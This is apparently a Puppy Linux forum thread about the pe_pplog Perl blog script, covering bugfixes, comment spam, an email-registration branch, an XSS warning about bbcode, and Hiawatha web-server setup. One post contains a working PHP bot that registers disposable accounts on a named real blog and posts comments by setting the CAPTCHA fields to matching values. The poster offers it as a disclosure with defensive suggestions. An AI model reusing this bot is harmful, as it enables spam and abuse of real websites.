pe_pplog v2.1b bufixes!

[efiabruni]

will do that once I'm back from travelling

until then, all the other bugfixes and featured I described are in v2.1b.

I also put the blog up on github (username: efiabruni) feel free to play around I'll be camping in Patagonia

[efiabruni]

The last four days I spent on a ferry and had time to play with the pplog
I made following changes in the pe_pplog on github:

Added comment preview option for the admin page
Added the preview comment button on the preview comment page (now comment can be previewed again and again and again)
Added a check for double posts of comments

Changed files are: Pe_pplog.pl; pe_admin.pl and pe_Config.pl

[BarryK]

efia,
I would appreciate your suggestions about what I should do.

I have been forced to disable comments on my blog, as someone has persisted in posting pornography comments.

I have been deleting them, but the person is persisting in posting more.

I was wondering how difficult it would be to implement email verification to register to post.

One way it could work, is when a user wants to post a comment, they first have to click a "Register" link. They provide their email address, to which their desired username and password are sent.

A log can be kept of usernames and email addresses, and the banning system can be expanded to ban users based on their email address.

Perhaps there are other ways of doing it.

[anikin]

Due to the moron named "Author", I have been forced to disable comments

That moron has many names: 'mafur', 'simargl13', 'simargl29' etc., He posted spam and pron on this forum too. Looks like he has a severe mental pathology and needs urgent medical attention.

[efiabruni]

Some people are depressingly destructive. I'm on holiday at the moment, but will look into it once I'm home. If someone has ideas, feel free to fork the blog on github!

[efiabruni]

I created a branch called comment_registration on github.
In this I changed the pe_pplog.pl file to:
not accept comments from not registered users
send a new mail with registration request to the admin if a new user tries to post

The admin has to manually edit the useres.ppl.data file. The syntax is: username'encrypted password"username2'encrypted password2"...

This is a quick&ugly fix

[efiabruni]

I have updated the branch commen_registration on https://github.com/efiabruni/pe_pplog to make it possible for users to register and for the admin to block users.

I could not test it thoroughly as i don't have sendmail or similar. I use a simple regEx for email validation, this is not the most secure way to use sendmail, please use with care.

This will not be part of the official pe_pplog

[gungsukma]

Code: Select all

I am bot   Posted on 7 Feb 2014, 12:09 by x6255
Barry should use REAL CAPTCHA.

I'm the one posted that on http://bkhome.org/news/?viewDetailed=00055

This is the script I have used (I used PHP, but it will be easy to be converted to other language).

Code: Select all

<?php
set_time_limit(100);

// Random username
$random = 'x'.rand(1000, 9999);
echo "Your username: $random<br/>";

// Make email adress
file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
echo "Your email: $random@opentrashbox.org<br/>";

// Register to Barry's blog, Wait for email
file_get_contents("http://bkhome.org/news/?do=register&username=$random&email=$random@opentrashbox.org&originalCode=AAAAAAAA&code=AAAAAAAA&process=register&Submit=Register");
sleep(30);

// Read inbox, Get the password
$contents = file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
preg_match("/password:\s*(\d+)/", $contents, $match);
$password = $match[1];
echo "Your password: $password<br/>";

// Add comment
file_get_contents("http://bkhome.org/news/?viewDetailed=00055&title=I+am+bot&author=$random&content=Barry+should+use+REAL+CAPTCHA.&originalCode=9999999&code=9999999&pass=$password&postTitle=Comments+are+back&sendComment=00055&Submit=Add+Comment");
echo "Barry should use *real captcha*.<br/>";

With that script, I can make and register random username and random email address. Someone blocks one, I'll make one (thanks, OpenTrashBox.org!).

But the one thing I want to show is the Security Code, you can trick it!
On the script, I don't even bother to read the security code, I just need to change the value of form element originalCode and code, then I can bypass the security code. These parts:
> originalCode=AAAAAAAA&code=AAAAAAAA
> originalCode=9999999&code=9999999

This is my suggestion:
- Just accept email register from GMail.com and Yahoo.com or any reputable email service
- Check the pattern of username of email address, just accept alphanumeric, dots, and underscore.
- For GMail, remove all dots and label in the email username (gungsukma@gmail.com, g.ung.suk.ma@gmail.com, gungsukma+bla.bla@gmail.com are all the same user).
- Use REAL CAPTCHA when register and add comment
- Disable the comment on the blog now, I have leaked the bot source code.

Oh, "gungsukma@gmail.com" is not mine

[efiabruni]

I am aware that the captcha is suboptimal, therefore there is also the "security question" option, which does not suffer from the same vulnerability and could even be set as a password.

Changes to comment_registration:
added disposable email services to block list by default
stricter rules for email validation

comment registration is never going to be an official feature, if someone feels like playing around with it, the code is on github on the branch comment_registration.
I simply do not have enough interest in this particular problem to muck around with it. I rather create galleries and css animations and stuff

Again, the easiest and safest way is to use the security question as a password and only give the answer to people you trust. If it is broken into, change it.

Also, before someone got a personal grudge and went out of his way to post spam, no bot got past the former security features of the pplog for the past 2 years that I have been using it, nor was it a problem for Barry until now.

[efiabruni]

There is a security issue with having bbcode enabled in comments in all the pplogs (original, SJPPlog and this one)

Due to very admissive parsing of the bbcode it is possible to insert javascript in comments when posting a link or a picture.
See http://tine.pagekite.me/pe_pplog.pl/?viewDetailed=00047 for an example. This makes comments vulnerable to xss attacks.

My advise is to disable bbcode on the comments of ALL versions of the PPLOG

What is needed:
URL / SRC validating and escaping
strict rules for which attributes are allowed, validating and escaping
additional html escaping

I will fix this properly in the coming weeks

[pagestep007]

Hi,
I am trying out the slacko6.3 64 bit version puppy. Noticed it did not have pplog, then tried all sorts of things , the pe_pplog on this thread I managed to get working on the 32 bit slacko6.3. but....not on the 64 bit. I notice this thread's last entry was 2014,Maybe the program has not been upgraded ...is pe_pplog 64 bit compatible?
Thanks.

[OscarTalks]

I looked into this and the problem seems to be that hiawatha in Slacko64 is reading the config file in /usr/etc/hiawatha rather than the one in /etc/hiawatha
See this post:-
http://murga-linux.com/puppy/viewtopic. ... 9&start=10
So long as you are aware of this you can configure it and get it working.

[pagestep007]

EXCELLENT ! Thank you.
I installed pplog- 1.1.3.pet and then pasted the following into the config file in usr/etc/hiawatha, and it all suddenly worked.



ServerId = webuser
ConnectionsTotal = 150
ConnectionsPerIP = 10
SystemLogfile = /var/log/hiawatha/system.log
GarbageLogfile = /var/log/hiawatha/garbage.log

Binding {
Port = 80
# Interface = 127.0.0.1
}
Hostname = 127.0.0.1
WebsiteRoot = /root/Web-Server
StartFile = index.html
AccessLogfile = /var/log/hiawatha/access.log
ErrorLogfile = /var/log/hiawatha/error.log

#add this stuff to get a perl script working (pplog)...
#QUISP has a binary executable CGI named 'quisp.bin'...
MimetypeConfig = /etc/mime.types
#CGIhandler = /usr/bin/perl:pl
CGIextension = pl,bin
ExecuteCGI = yes
#QUISP puts %0D, %0A (carriage-return, line-feed) chars in the url
#(v128), to allow chars below ascii 32 need this...
SecureURL = no


I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there. Thank you once again.

[OscarTalks]

I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there.

If you have the original pup_pplog installed and working you can easily substitute pe_pplog (which I presume is more advanced).

Install the .pet from the first post of this thread (hiawatha version of course).
Locate the file /usr/sbin/pplog_gui
Right click and open it as text.
Edit the line near the bottom so it reads:-
exec defaulthtmlviewer http://127.0.0.1:80/pe_pplog.pl
(the original line would be exec defaulthtmlviewer http://127.0.0.1:80/blog/pup_pplog.pl)
Save and close
The usual menu entry will then start and stop hiawatha as before
but the pplog button will launch pe_pplog instead of pup_pplog

[pagestep007]

YES INDEED, it worked wonderfully. Thank you.
As I am still on a fresh live CD, remastered onto a USB memory stick, I needed to first install pup_pplog, then do the config subtitution to get pup_pplog going, then changed the /usr/sbin/pplog_gui as you instructed. Works well. I will now remaster to another USB.

(a big thank you to all puppy people --maybe not the right thread to write in but ...)
By the way... I am a TV and Cine producer. My entire pipeline can be done from my slacko5.7- 32 bit CD, with a combo of open source programs on it. I can use it right from the disk anywhere on any machine. A few extra programs are stored elsewhere handy to install quickly when needed. The great thing is Puppy does not hog resources and just about everything goes to getting work done. I am using Pentium 4 comps, and some laptops to render on, with the fastest comp a duo core, and with Puppy, even 4K video is possible on these old machines. Blender 2.76b works faster on the 64 bit puppy, so now I am using the slacko6.3 64bit version for special effects processing. Not all my combo of programs work on the 64 bit system, but we will chip away at that one. (the 32 bit combo took about a year to get working well). So a HUGE thanks to all puppy people for your help in keeping us working.kudos to you all.